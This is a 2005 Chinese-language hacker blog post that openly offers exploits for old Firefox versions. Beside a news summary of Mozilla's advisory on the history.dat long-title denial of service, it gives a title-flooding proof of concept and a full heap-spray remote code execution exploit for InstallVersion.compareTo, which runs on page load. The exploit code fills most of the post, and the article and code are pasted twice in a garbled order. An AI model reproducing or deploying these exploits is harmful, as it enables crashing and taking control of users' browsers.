2005-12-15 22:36:34 by: h4x0r
Mozilla Firefox 历史文件拒绝服务漏洞Exp
不说严重性了``直接发EXP
我一直用IE,没测试过,大家下去自己看着办
---------------------------------------------------------------------
美国东部时间12月12日(北京时间12月13日)消息:Mozilla基金会日前发布了一份安全建议书,承认它对1.5版的火狐浏览器中存在的一个潜在漏洞非常担忧,这个漏洞可能会导致缓冲溢出错误。
然而,Mozilla公司在星期日发布的建议书中极力否认那个问题会对软件造成持续性破坏。它坚持称那个小问题很容易解决。
在上星期三的时候,针对这个潜在漏洞的第一个攻击代码被公布出来时,这个问题才对外公开。
问题出在history.dat这个非常长的文件中,如果历史文件大小超过10.5MB以后,系统就会变得非常慢,就好像死机了一样。 Mozilla公司说,此时计算机系统并没有真正地死机,它只是在花时间清理历史缓存。Mozilla公司指出,用户们只需将历史文件清除掉就可以解决这个问题。
Mozilla公司在声明中说它已经发布了一份安全建议书,内容是关于浏览器历史文件中的超长标题的网页文件引起的计算机在启动时陷入临时性的无反应状态的问题。如果用户遇到这个问题,只需清除浏览器历史记录就可以解决启动速度缓慢的问题。
Mozilla公司将这个问题评定为非重要级漏洞。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=374
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
上边的是packetstormsecurity.org公布的测试方法
< html>
< head>
<!-- Copyright (C) 2005-2006 Aviv Raff
Greets goes to SkyLined, The Insider and shutdown -->
< title>Mozilla (Firefox<=v1.04) InstallVersion->
compareTo Remote Code Execution Exploit< /title>
< script language="javascript">
function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=0x12000000;
// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");
// Size of the heap blocks
var heapBlockSize=0x400000;
// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;
// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("%u002C%u11C0");
//var spraySlide1 = unescape("%u7070%u7070"); // For testing
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C
//var spraySlide2 = unescape("%u8080%u8080"); // For testing
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i< heapBlocks;i++)
{
memory=(i%3==0) ? spraySlide1 + payLoadCode:
(i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}
// Set address to fake "pdata".
var eaxAddress = 0x1180002C;
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2< spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
// -->
< /script>
< /head>
< body onload="BodyOnLoad()">
< /body>
< /html>
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
上边的是packetstormsecurity.org公布的测试方法
< html>
< head>
<!-- Copyright (C) 2005-2006 Aviv Raff
Greets goes to SkyLined, The Insider and shutdown -->
< title>Mozilla (Firefox<=v1.04) InstallVersion->
compareTo Remote Code Execution Exploit< /title>
< script language="javascript">
function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=0x12000000;
// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");
// Size of the heap blocks
var heapBlockSize=0x400000;
// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;
// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("%u002C%u11C0");
//var spraySlide1 = unescape("%u7070%u7070"); // For testing
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C
//var spraySlide2 = unescape("%u8080%u8080"); // For testing
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i< heapBlocks;i++)
{
memory=(i%3==0) ? spraySlide1 + payLoadCode:
(i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}
// Set address to fake "pdata".
var eaxAddress = 0x1180002C;
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2< spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
// -->
< /script>
< /head>
< body onload="BodyOnLoad()">
< /body>
< /html>
我一直用IE,没测试过,大家下去自己看着办
---------------------------------------------------------------------
美国东部时间12月12日(北京时间12月13日)消息:Mozilla基金会日前发布了一份安全建议书,承认它对1.5版的火狐浏览器中存在的一个潜在漏洞非常担忧,这个漏洞可能会导致缓冲溢出错误。
然而,Mozilla公司在星期日发布的建议书中极力否认那个问题会对软件造成持续性破坏。它坚持称那个小问题很容易解决。
在上星期三的时候,针对这个潜在漏洞的第一个攻击代码被公布出来时,这个问题才对外公开。
问题出在history.dat这个非常长的文件中,如果历史文件大小超过10.5MB以后,系统就会变得非常慢,就好像死机了一样。 Mozilla公司说,此时计算机系统并没有真正地死机,它只是在花时间清理历史缓存。Mozilla公司指出,用户们只需将历史文件清除掉就可以解决这个问题。
Mozilla公司在声明中说它已经发布了一份安全建议书,内容是关于浏览器历史文件中的超长标题的网页文件引起的计算机在启动时陷入临时性的无反应状态的问题。如果用户遇到这个问题,只需清除浏览器历史记录就可以解决启动速度缓慢的问题。
Mozilla公司将这个问题评定为非重要级漏洞。
[Last Modified By h4x0r, at 2007-02-19 21:17:16]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=374
There is no comment on this article.








